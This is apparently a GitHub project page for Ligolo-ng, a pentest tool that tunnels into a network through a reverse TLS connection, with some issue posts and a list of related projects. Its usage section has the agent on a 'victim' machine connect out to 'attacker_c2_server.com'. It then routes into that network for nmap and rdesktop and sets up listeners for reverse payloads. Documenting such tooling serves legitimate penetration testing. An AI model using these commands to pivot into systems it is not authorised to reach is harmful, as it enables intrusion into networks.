An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.

Overview

Ligolo-ng : Tunneling like a VPN

Ligolo Logo

An advanced, yet simple, tunneling tool that uses a TUN interface.

by TNP IT Security

GPLv3 Go Report

Table of Contents

Introduction

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection without the need of SOCKS.

Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with LetsEncrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

As an example, for a TCP connection:

  • SYN are translated to connect() on remote
  • SYN-ACK is sent back if connect() succeed
  • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
  • Nothing is sent if timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Building Ligolo-ng

Building ligolo-ng:

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build agent for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go

Setup Ligolo-ng

Start the proxy server on your Command and Control (C2) server (default 11601 listening will be use):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

When using -autocert, the proxy will automatically request a certificate (using Letsencrypt) for attacker_c2_server.com when an agent connects.

Self-signed certificates (NOT RECOMMENDED)

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Self-signed certificates can be generated using the following command:

# NOT RECOMMENDED! Don't use self-signed certificates.
$ go run `go env GOROOT`/src/crypto/tls/generate_cert.go -ecdsa-curve P256 -ed25519 -host yourhostname.com

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

A session should appear on the proxy server.

INFO[0102] Agent joined. [email protected] remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng » session 
? Specify a session : 1 - [email protected] - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : [email protected]] » ifconfig 
[...]
┌─────────────────────────────────────────────┐
│ Interface 3                                 │
├──────────────┬──────────────────────────────┤
│ Name         │ wlp3s0                       │
│ Hardware MAC │ de:ad:be:ef:ca:fe            │
│ MTU          │ 1500                         │
│ Flags        │ up|broadcast|multicast       │
│ IPv4 Address │ 192.168.0.30/24             │
└──────────────┴──────────────────────────────┘

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

$ sudo ip route add 192.168.0.0/24 dev ligolo

Start the tunnel on the proxy:

[Agent : [email protected]] » start
[Agent : [email protected]] » INFO[0690] Starting tunnel to [email protected]   

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : [email protected]] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!            

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : [email protected]] » listener_list 
┌───────────────────────────────────────────────────────────────────────────────┐
│ Active listeners                                                              │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT                   │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ [email protected] │ 0.0.0.0:1234           │ 127.0.0.1:4321         │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘

[Agent : [email protected]] » listener_stop 0
INFO[1505] Listener closed.                             

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[  5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval           Transfer     Bitrate         Retr  Cwnd
[  5]   0.00-1.00   sec  12.5 MBytes   105 Mbits/sec    0    164 KBytes       
[  5]   1.00-2.00   sec  12.7 MBytes   107 Mbits/sec    0    263 KBytes       
[  5]   2.00-3.00   sec  12.4 MBytes   104 Mbits/sec    0    263 KBytes       
[  5]   3.00-4.00   sec  12.7 MBytes   106 Mbits/sec    0    263 KBytes       
[  5]   4.00-5.00   sec  13.1 MBytes   110 Mbits/sec    2    134 KBytes       
[  5]   5.00-6.00   sec  13.4 MBytes   113 Mbits/sec    0    147 KBytes       
[  5]   6.00-7.00   sec  12.6 MBytes   105 Mbits/sec    0    158 KBytes       
[  5]   7.00-8.00   sec  12.1 MBytes   101 Mbits/sec    0    173 KBytes       
[  5]   8.00-9.00   sec  12.7 MBytes   106 Mbits/sec    0    182 KBytes       
[  5]   9.00-10.00  sec  12.6 MBytes   106 Mbits/sec    0    188 KBytes       
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bitrate         Retr
[  5]   0.00-10.00  sec   127 MBytes   106 Mbits/sec    2             sender
[  5]   0.00-10.08  sec   125 MBytes   104 Mbits/sec                  receiver

Caveats

Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Implement multi-platform proxy.

Credits

  • Nicolas Chatelain <nicolas.chatelain -at- tnpconsultants.com>

tnpitsecurity.com

Issues
  • Feature request: use ligolo without certificates

    Feature request: use ligolo without certificates

    I'd like to be able to use it on internal pentests or HackTheBox using only IP addresses, no domain names or certificates. This doesn't seem possible. Thanks

    enhancement 
    opened by sdcampbell 5
  • [FEATURE REQUEST] Please create binary release

    [FEATURE REQUEST] Please create binary release

    Hello! Thanks for ligolo-ng. I try add ligolo-ng to https://github.com/devops-works/binenv But project dont have binary release. Please create binary release.

    enhancement 
    opened by patsevanton 1
  • app.go: fix typo

    app.go: fix typo

    null

    opened by elohmeier 0
  • [FEATURE REQUEST] Administration web panel

    [FEATURE REQUEST] Administration web panel

    Hi,

    It would be great if you could have a web admin panel for ligolo-ng so users can manage sessions, start/stop tunnel on each session, viewing ifconfig, etc...

    interested to you too? and any plan to add this feature?

    Regards.

    opened by davisaqueen 0
  • Exclusions handling on network error and disconnect

    Exclusions handling on network error and disconnect

    If there are some network errors agent exits (because yamux keepalive exclusion) but server does not realize some session abort If yamux session broken. So U do not know about agent status until try to intecact with it. I think that agent would have some reconnection capabilities if yamux fail and server must handle this too..

    enhancement 
    opened by virusvfv 0
  • Include windows version of proxy (server) for windows without TUN

    Include windows version of proxy (server) for windows without TUN

    I really would appreciate if you include the windows version of proxy (server) without using TUN like the original ligolo does. I use another software to redirect all traffic to proxy (server) and also TUN isn't available in windows. A TAP driver must be created in windows but i am far from a expert in this field.

    enhancement 
    opened by dennyvsdev 3
Owner
TNP IT Security
TNP IT Security
⚔️ Web Hacker's Weapons / A collection of cool tools used by Web hackers. Happy hacking , Happy bug-hunting

A collection of cool tools used by Web hackers. Happy hacking , Happy bug-hunting Family project Table of Contents WHW-Tools Weapons Awesome Bookmarkl

HAHWUL 1.6k Sep 16, 2021
A curated list of awesome Kubernetes tools and resources.

Awesome Kubernetes Resources A curated list of awesome Kubernetes tools and resources. Inspired by awesome list and donnemartin/awesome-aws. The Fiery

Tom Huang 881 Sep 22, 2021
Parallel S3 and local filesystem execution tool.

s5cmd Overview s5cmd is a very fast S3 and local filesystem execution tool. It comes with support for a multitude of operations including tab completi

Peak 780 Sep 15, 2021
Gohalt 👮‍♀🛑: Fast; Simple; Powerful; Go Throttler library

Gohalt ??‍♀ ?? : Fast; Simple; Powerful; Go Throttler library go get -u github.com/1pkg/gohalt Introduction Gohalt is simple and convenient yet powerf

Kostiantyn Masliuk 258 Aug 14, 2021
µTask is an automation engine that models and executes business processes declared in yaml. ✏️📋

µTask, the Lightweight Automation Engine µTask is an automation engine built for the cloud. It is: simple to operate: only a postgres DB is required s

OVHcloud 516 Sep 19, 2021
🐶 Kubernetes CLI To Manage Your Clusters In Style!

K9s - Kubernetes CLI To Manage Your Clusters In Style! K9s provides a terminal UI to interact with your Kubernetes clusters. The aim of this project i

Fernand Galiana 13.5k Sep 20, 2021
Blast is a simple tool for API load testing and batch jobs

Blast Blast makes API requests at a fixed rate. The number of concurrent workers is configurable. The rate may be changed interactively during executi

Dave Brophy 200 Jul 14, 2021
kubetnl tunnels TCP connections from within a Kubernetes cluster to a cluster-external endpoint, e.g. to your local machine. (the perfect complement to kubectl port-forward)

kubetnl kubetnl (kube tunnel) is a command line utility to tunnel TCP connections from within a Kubernetes to a cluster-external endpoint, e.g. to you

null 3 Sep 7, 2021
A Simple and Comprehensive Vulnerability Scanner for Container Images, Git Repositories and Filesystems. Suitable for CI

A Simple and Comprehensive Vulnerability Scanner for Containers and other Artifacts, Suitable for CI. Table of Contents Abstract Features Installation

Aqua Security 8.6k Sep 22, 2021
Build powerful pipelines in any programming language.

Gaia is an open source automation platform which makes it easy and fun to build powerful pipelines in any programming language. Based on HashiCorp's g

Gaia 4.5k Sep 20, 2021
AWS Cloudtrail event alerting lambda function. Send alerts to Slack, Email, or SNS.

Cloudtrail-Tattletail is a Lambda based Cloudtrail alerting tool. It allows you to write simple rules for interesting Cloudtrail events and forward those events to a number of different systems.

Peter Sanford 5 Jul 14, 2021
A toolbox for debugging docker container and kubernetes with web UI.

A toolbox for debugging Docker container and Kubernetes with visual web UI. You can start the debugging journey on any docker container host! You can

CloudNativer 7 May 18, 2021
k6 is a modern load testing tool for developers and testers in the DevOps era.

k6 is a modern load testing tool, building on our years of experience in the load and performance testing industry. It provides a clean, approachable scripting API, local and cloud execution, and flexible configuration.

k6 13.9k Sep 20, 2021
NovelAI Research Tool and API implementations in Golang

NovelAI Research Tool - nrt A golang based client with: Minimum Viable Product implementation of a NovelAI service API client covering: /user/login -

Wes Brown 14 Sep 12, 2021
Putting serverless on your server

Matterless: putting serverless on your server Serverless computing enables you to build applications that automatically scale with demand, and your wa

Zef Hemel 21 Sep 21, 2021
Fast directory traversal for Golang

godirwalk godirwalk is a library for traversing a directory tree on a file system. In short, why do I use this library? It's faster than filepath.Walk

Karrick McDermott 544 Sep 14, 2021
a build tool for Go, with a focus on cross-compiling, packaging and deployment

goxc NOTE: goxc has long been in maintenance mode. Ever since Go1.5 supported simple cross-compilation, this tool lost much of its value. There are st

Am Laher 1.7k Aug 25, 2021
Kilo is a multi-cloud network overlay built on WireGuard and designed for Kubernetes (k8s + wg = kg)

Kilo Kilo is a multi-cloud network overlay built on WireGuard and designed for Kubernetes. Overview Kilo connects nodes in a cluster by providing an e

Lucas Servén Marín 1.1k Sep 25, 2021
Devtron is an open source software delivery workflow for kubernetes written in go.

Devtron is an open source software delivery workflow for kubernetes written in go.

Devtron Labs 1.3k Sep 26, 2021